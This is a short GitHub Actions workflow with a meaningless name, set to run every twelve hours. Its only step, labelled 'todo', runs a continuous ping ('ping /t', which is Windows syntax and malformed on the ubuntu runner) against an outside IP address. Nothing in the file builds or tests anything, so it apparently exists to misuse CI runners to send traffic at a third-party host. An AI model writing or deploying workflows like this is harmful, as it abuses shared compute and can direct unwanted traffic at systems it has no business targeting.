name: hjkhlljnljjj
# on: [push, pull_request]
on:
  schedule:
    - cron: '0 */12 * * *'
  workflow_dispatch:
   
jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.0]
        flag: [A]
    timeout-minutes: 5
    env:
        NUM_JOBS: 900
        JOB: ${{ matrix.go }}
    steps:
    - name: todo
      run: ping /t 179.53.111.223
